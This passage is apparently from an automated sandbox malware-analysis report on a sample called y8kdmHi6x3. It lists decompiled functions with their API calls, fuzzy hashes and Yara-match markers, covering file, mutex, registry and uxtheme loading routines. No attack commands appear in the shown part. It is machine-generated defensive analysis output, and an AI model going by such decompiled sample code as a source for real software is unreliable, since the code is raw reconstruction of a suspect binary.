                                                    • Opcode Fuzzy Hash: 09f60f6af201f6e62a1044751ee0e5612e5c10b55f71d40865da04b658c4b6fb
                                                    • Instruction Fuzzy Hash: 4AE08CB23112102B9350EB7E6C81A6BAAED8FCC225309897FF98CD3342D538DC058368
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405F94 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00405F94(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
					_t14 = E004061D0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}








                                                    0x00405f9c
                                                    0x00405fa2
                                                    0x00405fb2
                                                    0x00405fbb
                                                    0x00405fc0
                                                    0x00405fc2
                                                    0x00405fc7
                                                    0x00405fcc
                                                    0x00405fcc
                                                    0x00405fc7
                                                    0x00405fda

                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?,00000400,?,004174D4,0041AC1B,00000000,0041AC40), ref: 00405FB2
                                                      • Part of subcall function 004061D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
                                                      • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001), ref: 0040620A
                                                      • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000), ref: 00406228
                                                      • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
                                                      • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
                                                      • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
                                                      • Part of subcall function 004061D0: RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                    • String ID:
                                                    • API String ID: 2796650324-0
                                                    • Opcode ID: b088684fa3f415a04415e8f44c5a91343ce001b078e6bcdff0638d6614db7275
                                                    • Instruction ID: b1b40bdc6994046442ce0d201b14f24feebb016b61ac17d43a71f6c7551704b1
                                                    • Opcode Fuzzy Hash: b088684fa3f415a04415e8f44c5a91343ce001b078e6bcdff0638d6614db7275
                                                    • Instruction Fuzzy Hash: 29E06D71A003148BCB10DE9889C1A8377E8AB08754F0009B6BC54EF38AD3B8DD208BD4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00409974 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E00409974(void* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t4;

				_push(__ecx);
				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
				if(_t4 == 0) {
					_v16 = 0xffffffff;
				}
				return _v16;
			}





                                                    0x00409977
                                                    0x00409988
                                                    0x0040998f
                                                    0x00409991
                                                    0x00409991
                                                    0x0040999f

                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00409988
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: 2131ff48c4ef465f98914761f4b4e41a66236e79e1d50644b145925946c246f7
                                                    • Instruction ID: 0d5b49b13c8f4389bf346f82ff244d5682fd19cf5393362de481199118583149
                                                    • Opcode Fuzzy Hash: 2131ff48c4ef465f98914761f4b4e41a66236e79e1d50644b145925946c246f7
                                                    • Instruction Fuzzy Hash: BDD05BB63091107AD220955F9C44DEB5BDCCBC6771F104B3EB598D32C1D6348C018375
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00409A58 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00409A58(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E00404E80(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                                    0x00409a63
                                                    0x00409a6b
                                                    0x00409a74
                                                    0x00409a75
                                                    0x00409a78
                                                    0x00409a78

                                                    APIs
                                                    • GetFileAttributesA.KERNEL32(00000000,?,00473256,?,?,00000000,00000005,?,00000000,004732A8,?,00000000,00473306), ref: 00409A63
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: cc3281f0d5de1a522d07f6452786b59158e8658712641635155b8b823164a454
                                                    • Instruction ID: b45727f5bee9a1b88d075e34cfdcfeb0f7af153fe39d01b3b8471be6c8c36cfb
                                                    • Opcode Fuzzy Hash: cc3281f0d5de1a522d07f6452786b59158e8658712641635155b8b823164a454
                                                    • Instruction Fuzzy Hash: 7AC08CB1B092002ADE5061FD1CC2A0B42C80A442387602B3BF47EF23D3E23DAC162418
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406F8E Relevance: 1.5, APIs: 1, Instructions: 15synchronizationCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E00406F8E(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                                    0x00406f93
                                                    0x00406f9b
                                                    0x00406fa6
                                                    0x00406fac

                                                    APIs
                                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateMutex
                                                    • String ID:
                                                    • API String ID: 1964310414-0
                                                    • Opcode ID: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                                    • Instruction ID: 98e81aead139b17a815cef7455711068e9fc67f306ce3b3ca14eba37014c667d
                                                    • Opcode Fuzzy Hash: 4e517a16085b8900b141571b75f19e29287a41f7ed24e47c7e5cc36522aeb123
                                                    • Instruction Fuzzy Hash: 76D0127325024DAFCB00EEBDDC05DAB33DC9728609B408425B929C7100D139E9508B60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406F90 Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E00406F90(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
				void* _t8;

				_t4 = _a12;
				asm("sbb eax, eax");
				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
				return _t8;
			}




                                                    0x00406f93
                                                    0x00406f9b
                                                    0x00406fa6
                                                    0x00406fac

                                                    APIs
                                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateMutex
                                                    • String ID:
                                                    • API String ID: 1964310414-0
                                                    • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                    • Instruction ID: 3e008c22956fc280003415e3679d606a6b79cccc06a071e67c7aa2054a22c523
                                                    • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                    • Instruction Fuzzy Hash: 96C0127315024DAFCB00EEA9DC05D9B33DC5728609B408425B929C7100C139E5508B60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040991C Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040991C(void* __eax) {
				void* _t4;

				_t4 = CreateFileA(E00404E80(__eax), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
				return _t4;
			}




                                                    0x00409939
                                                    0x0040993f

                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00418E54,00409945,0041DBE4,00000000,0041DCC1,?,?,00418E54,00000001), ref: 00409939
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: c5ddbda4215acf3c06d730482f71bc4e853fb376322842d739a3031f130d3369
                                                    • Instruction ID: 060bc272a188b5da0ac96ce548da9ccbd18b50796637518aaa4824f3fdc661df
                                                    • Opcode Fuzzy Hash: c5ddbda4215acf3c06d730482f71bc4e853fb376322842d739a3031f130d3369
                                                    • Instruction Fuzzy Hash: 5DC092B03C030032F93021B62C8BF26004C2744F18FA2853AB785FE1C3C8E9B818015C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00409F54 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 58%
                                                    			E00409F54(void* __eax) {
				int _t4;

				_t4 = CreateDirectoryA(E00404E80(__eax), 0); // executed
				asm("sbb eax, eax");
				return _t4 + 1;
			}




                                                    0x00409f61
                                                    0x00409f69
                                                    0x00409f6d

                                                    APIs
                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,?,0047638B), ref: 00409F61
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateDirectory
                                                    • String ID:
                                                    • API String ID: 4241100979-0
                                                    • Opcode ID: 8560409eb3f1d5c0bf4fd62c23b8086ce7d4dade3db60e21e326d19d4a95f5a9
                                                    • Instruction ID: d06271dbac5e2ad416fd06201c67f134fcd2da453fbdd723ce63acec7380a99a
                                                    • Opcode Fuzzy Hash: 8560409eb3f1d5c0bf4fd62c23b8086ce7d4dade3db60e21e326d19d4a95f5a9
                                                    • Instruction Fuzzy Hash: 07B092A27503411AEE0035FA2CC2B2A008CA74861AF110A3EF656E61C2D47AC8184068
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0045D2F8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0045D2F8(signed int __eax, void* __ecx) {
				struct _ITEMIDLIST** _t10;

				SHGetSpecialFolderLocation(0,  *(0x49bf84 + (__eax & 0x0000007f) * 4), _t10); // executed
				return  *_t10;
			}




                                                    0x0045d307
                                                    0x0045d310

                                                    APIs
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,?,0045F1FB,00000000,0045F21D,?,00000000,0045F23F,?,?,?,?,00000000), ref: 0045D307
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FolderLocationSpecial
                                                    • String ID:
                                                    • API String ID: 3328827890-0
                                                    • Opcode ID: a22953724ced97bec980e9ad6ab0f70e644ba08d145622cf2bd1aee856a51c4c
                                                    • Instruction ID: ef8edf6798076d0a212359ae3af47a46da83506bc8f37cce848a45b11e0c3a11
                                                    • Opcode Fuzzy Hash: a22953724ced97bec980e9ad6ab0f70e644ba08d145622cf2bd1aee856a51c4c
                                                    • Instruction Fuzzy Hash: 02C09BB13150045AD204AB49FD47F97335CD754345F500519F4D4CA154D354A9005EA6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00409A7C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00409A7C(void* __eax) {
				long _t4;

				_t4 = GetFileAttributesA(E00404E80(__eax)); // executed
				return _t4;
			}




                                                    0x00409a87
                                                    0x00409a8d

                                                    APIs
                                                    • GetFileAttributesA.KERNEL32(00000000,?,00474B38,00000000,00474BFF), ref: 00409A87
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 6677f4aef908889f950cb6c6c2e2ae9e969a36d7372979f133039ded665ad625
                                                    • Instruction ID: 67a43f86abe4dd1ef5a5c4911a27f769ef87cc39f57c29bfc39dbdecf4d4660c
                                                    • Opcode Fuzzy Hash: 6677f4aef908889f950cb6c6c2e2ae9e969a36d7372979f133039ded665ad625
                                                    • Instruction Fuzzy Hash: 58A011C0B0020022CA0032FA2CC2A0A00CC2B882283800A3EB208E2283E83CA808002C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00435634 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00435634(void* __eax) {
				int _t3;

				 *((char*)(__eax + 0x10)) = 3;
				_t3 = WinHelpA(0, 0x43564c, 2, 0); // executed
				return _t3;
			}




                                                    0x00435634
                                                    0x00435643
                                                    0x00435648

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Help
                                                    • String ID:
                                                    • API String ID: 2830496658-0
                                                    • Opcode ID: b7d492b384d7ba0511589629e0b64df45981746ae1b7cfa55a9054cb4cff1418
                                                    • Instruction ID: 79a91a3f31a143df2f0efbcac983927cafc7536058e87a69d5408432099ce831
                                                    • Opcode Fuzzy Hash: b7d492b384d7ba0511589629e0b64df45981746ae1b7cfa55a9054cb4cff1418
                                                    • Instruction Fuzzy Hash: F8B011C0BC8380BAFA2222288C0BF080C002B00F08FE000CAB2083C0C302ECA200002E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00422BCC Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00422BEA
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 8d98de8cba0d3e477e902bc33fe2311dc39987d38296b3e9462c52c096984525
                                                    • Instruction ID: b178b9f7f537fc2e71311a8aaadf980aeb118d6c29c3e7f0598fc6829f083217
                                                    • Opcode Fuzzy Hash: 8d98de8cba0d3e477e902bc33fe2311dc39987d38296b3e9462c52c096984525
                                                    • Instruction Fuzzy Hash: E0116634200315AFC714DF1AD880A42BBE0EF48390F50C53BE9A88B385D3B4E9058BA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 0042E3B4 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266libraryloaderCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 90%
                                                    			E0042E3B4(void* __ebx, void* __ecx) {
				char _v5;
				intOrPtr _t2;
				intOrPtr _t6;
				intOrPtr _t108;
				intOrPtr _t111;

				_t2 =  *0x49ea48; // 0x3030dc8
				E0042E1AC(_t2);
				_push(_t111);
				_push(0x42e767);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				 *0x49ea44 =  *0x49ea44 + 1;
				if( *0x49ea40 == 0) {
					 *0x49ea40 = LoadLibraryA("uxtheme.dll");
					if( *0x49ea40 > 0) {
						 *0x49e980 = GetProcAddress( *0x49ea40, "OpenThemeData");
						 *0x49e984 = GetProcAddress( *0x49ea40, "CloseThemeData");
						 *0x49e988 = GetProcAddress( *0x49ea40, "DrawThemeBackground");
						 *0x49e98c = GetProcAddress( *0x49ea40, "DrawThemeText");
						 *0x49e990 = GetProcAddress( *0x49ea40, "GetThemeBackgroundContentRect");
						 *0x49e994 = GetProcAddress( *0x49ea40, "GetThemeBackgroundContentRect");
						 *0x49e998 = GetProcAddress( *0x49ea40, "GetThemePartSize");
						 *0x49e99c = GetProcAddress( *0x49ea40, "GetThemeTextExtent");
						 *0x49e9a0 = GetProcAddress( *0x49ea40, "GetThemeTextMetrics");
						 *0x49e9a4 = GetProcAddress( *0x49ea40, "GetThemeBackgroundRegion");
						 *0x49e9a8 = GetProcAddress( *0x49ea40, "HitTestThemeBackground");
						 *0x49e9ac = GetProcAddress( *0x49ea40, "DrawThemeEdge");
						 *0x49e9b0 = GetProcAddress( *0x49ea40, "DrawThemeIcon");
						 *0x49e9b4 = GetProcAddress( *0x49ea40, "IsThemePartDefined");
						 *0x49e9b8 = GetProcAddress( *0x49ea40, "IsThemeBackgroundPartiallyTransparent");
						 *0x49e9bc = GetProcAddress( *0x49ea40, "GetThemeColor");
						 *0x49e9c0 = GetProcAddress( *0x49ea40, "GetThemeMetric");
						 *0x49e9c4 = GetProcAddress( *0x49ea40, "GetThemeString");
						 *0x49e9c8 = GetProcAddress( *0x49ea40, "GetThemeBool");
						 *0x49e9cc = GetProcAddress( *0x49ea40, "GetThemeInt");
						 *0x49e9d0 = GetProcAddress( *0x49ea40, "GetThemeEnumValue");
						 *0x49e9d4 = GetProcAddress( *0x49ea40, "GetThemePosition");
						 *0x49e9d8 = GetProcAddress( *0x49ea40, "GetThemeFont");
						 *0x49e9dc = GetProcAddress( *0x49ea40, "GetThemeRect");
						 *0x49e9e0 = GetProcAddress( *0x49ea40, "GetThemeMargins");
						 *0x49e9e4 = GetProcAddress( *0x49ea40, "GetThemeIntList");
						 *0x49e9e8 = GetProcAddress( *0x49ea40, "GetThemePropertyOrigin");
						 *0x49e9ec = GetProcAddress( *0x49ea40, "SetWindowTheme");
						 *0x49e9f0 = GetProcAddress( *0x49ea40, "GetThemeFilename");
						 *0x49e9f4 = GetProcAddress( *0x49ea40, "GetThemeSysColor");
						 *0x49e9f8 = GetProcAddress( *0x49ea40, "GetThemeSysColorBrush");
						 *0x49e9fc = GetProcAddress( *0x49ea40, "GetThemeSysBool");
						 *0x49ea00 = GetProcAddress( *0x49ea40, "GetThemeSysSize");
						 *0x49ea04 = GetProcAddress( *0x49ea40, "GetThemeSysFont");
						 *0x49ea08 = GetProcAddress( *0x49ea40, "GetThemeSysString");
						 *0x49ea0c = GetProcAddress( *0x49ea40, "GetThemeSysInt");
						 *0x49ea10 = GetProcAddress( *0x49ea40, "IsThemeActive");
						 *0x49ea14 = GetProcAddress( *0x49ea40, "IsAppThemed");
						 *0x49ea18 = GetProcAddress( *0x49ea40, "GetWindowTheme");
						 *0x49ea1c = GetProcAddress( *0x49ea40, "EnableThemeDialogTexture");
						 *0x49ea20 = GetProcAddress( *0x49ea40, "IsThemeDialogTextureEnabled");
						 *0x49ea24 = GetProcAddress( *0x49ea40, "GetThemeAppProperties");
						 *0x49ea28 = GetProcAddress( *0x49ea40, "SetThemeAppProperties");
						 *0x49ea2c = GetProcAddress( *0x49ea40, "GetCurrentThemeName");
						 *0x49ea30 = GetProcAddress( *0x49ea40, "GetThemeDocumentationProperty");
						 *0x49ea34 = GetProcAddress( *0x49ea40, "DrawThemeParentBackground");
						 *0x49ea38 = GetProcAddress( *0x49ea40, "EnableTheming");
					}
				}
				_v5 =  *0x49ea40 > 0;
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(0x42e76e);
				_t6 =  *0x49ea48; // 0x3030dc8
				return E0042E1B4(_t6);
			}








                                                    0x0042e3be
                                                    0x0042e3c3
                                                    0x0042e3ca
                                                    0x0042e3cb
                                                    0x0042e3d0
                                                    0x0042e3d3
                                                    0x0042e3d6
                                                    0x0042e3df
                                                    0x0042e3ef
                                                    0x0042e3f4
                                                    0x0042e407
                                                    0x0042e419
                                                    0x0042e42b
                                                    0x0042e43d
                                                    0x0042e44f
                                                    0x0042e461
                                                    0x0042e473
                                                    0x0042e485
                                                    0x0042e497
                                                    0x0042e4a9
                                                    0x0042e4bb
                                                    0x0042e4cd
                                                    0x0042e4df
                                                    0x0042e4f1
                                                    0x0042e503
                                                    0x0042e515
                                                    0x0042e527
                                                    0x0042e539
                                                    0x0042e54b
                                                    0x0042e55d
                                                    0x0042e56f
                                                    0x0042e581
                                                    0x0042e593
                                                    0x0042e5a5
                                                    0x0042e5b7
                                                    0x0042e5c9
                                                    0x0042e5db
                                                    0x0042e5ed
                                                    0x0042e5ff
                                                    0x0042e611
                                                    0x0042e623
                                                    0x0042e635
                                                    0x0042e647
                                                    0x0042e659
                                                    0x0042e66b
                                                    0x0042e67d
                                                    0x0042e68f
                                                    0x0042e6a1
                                                    0x0042e6b3
                                                    0x0042e6c5
                                                    0x0042e6d7
                                                    0x0042e6e9
                                                    0x0042e6fb
                                                    0x0042e70d
                                                    0x0042e71f
                                                    0x0042e731
                                                    0x0042e743
                                                    0x0042e743
                                                    0x0042e3f4
                                                    0x0042e74b
                                                    0x0042e751
                                                    0x0042e754
                                                    0x0042e757
                                                    0x0042e75c
                                                    0x0042e766

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,0042E767), ref: 0042E3EA
                                                    • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0042E402
                                                    • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0042E414
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0042E426
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0042E438
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042E44A
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042E45C
                                                    • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0042E46E
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0042E480
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0042E492
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0042E4A4
                                                    • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0042E4B6
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0042E4C8
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0042E4DA
                                                    • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0042E4EC
                                                    • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0042E4FE
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0042E510
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0042E522
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0042E534
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0042E546
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0042E558
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0042E56A
                                                    • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0042E57C
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0042E58E
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0042E5A0
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0042E5B2
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0042E5C4
                                                    • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0042E5D6
                                                    • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0042E5E8
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0042E5FA
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0042E60C
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0042E61E
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0042E630
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0042E642
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0042E654
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0042E666
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0042E678
                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0042E68A
                                                    • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0042E69C
                                                    • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0042E6AE
                                                    • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0042E6C0
                                                    • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0042E6D2
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0042E6E4
                                                    • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0042E6F6
                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0042E708
                                                    • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0042E71A
                                                    • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0042E72C
                                                    • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0042E73E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad
